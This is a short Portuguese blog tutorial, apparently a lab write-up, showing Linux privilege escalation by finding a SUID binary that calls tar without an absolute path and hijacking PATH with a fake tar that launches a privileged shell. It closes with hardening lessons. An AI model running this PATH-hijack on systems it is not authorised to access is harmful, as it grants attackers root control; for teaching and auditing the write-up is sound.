Tutorial
Write-up: Escalação de privilégios em máquina Linux via SUID mal configurado
22 de julho de 2026 · 2 min de leitura · Zero Day Security
Neste write-up vamos percorrer o processo completo de escalação de privilégios em uma máquina Linux vulnerável, desde a enumeração inicial até a obtenção de acesso root, explorando um binário com o bit SUID mal configurado.
1. Enumeração inicial
Após obter acesso como usuário de baixo privilégio, o primeiro passo é mapear binários com permissão SUID:
find / -perm -4000 -type f 2>/dev/nullEntre os resultados, identificamos um binário fora do padrão:
-rwsr-xr-x 1 root root 35608 Jun 12 2025 /usr/local/bin/backup_tool2. Análise do binário
Executando strings no binário, percebemos que ele chama o utilitário tar
sem especificar o caminho absoluto:
strings /usr/local/bin/backup_tool | grep tarIsso indica uma possível exploração via manipulação de $PATH.
3. Exploração
Criamos um binário tar malicioso e ajustamos o $PATH para que seja
executado no lugar do tar legítimo:
cat << 'EOF' > /tmp/tar
#!/bin/bash
/bin/bash -p
EOF
chmod +x /tmp/tar
export PATH=/tmp:$PATH
/usr/local/bin/backup_tool4. Confirmação do acesso root
whoami
# rootLições aprendidas
- Nunca conceder SUID a scripts ou binários que invocam outros programas sem caminho absoluto.
- Auditar periodicamente binários com bits SUID/SGID no sistema.
- Utilizar
PATHfixo e restritivo em scripts privilegiados.
Gostou? Receba novos artigos por e-mail.